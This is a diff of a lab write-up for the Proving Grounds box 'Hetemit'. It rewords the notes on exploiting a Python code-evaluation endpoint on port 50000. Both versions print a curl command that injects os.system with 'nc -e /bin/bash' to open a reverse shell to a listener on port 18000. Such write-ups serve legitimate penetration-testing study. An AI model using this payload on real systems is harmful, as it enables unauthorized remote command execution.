Bsal13/Offensive-Security-Proving-Grounds-Boxes/Hetemit (Intermediate) Linux Box.md

 # Exploitation
 ## os.system  Command Execution

-#### -As found from the nmap scan port 50000 is running python 3.6 I typed "os" as a module and find the following showing the existence of it running python 3.6 module:
+To exploit the application, the os.system command execution method was used.
+Since port 50000 was found to be running Python 3.6 from the NMAP output, the command os.system was tested to confirm Python 3.6 presence.

 ![](Images/Pasted%20image%2020221016153044.png)

+- We start a penelope listener on port 18000

+- A reverse shell was returned from the penelope listener that was running on port 18000 when we typed the following command.

-#### -Ran a netcat listener on port 18000 and typed "curl -X POST --data "code=os.system('nc -e /bin/bash [kali IP] 18000')" http://192.168.241.117:50000/verify" and got a reverse shell:
+curl -X POST --data "code=os.system('nc -e /bin/bash 192.168.45.161 18000')" http://192.168.229.117:50000/verify

 ![](Images/Pasted%20image%2020221016195553.png)
 #os.systemCommandExecution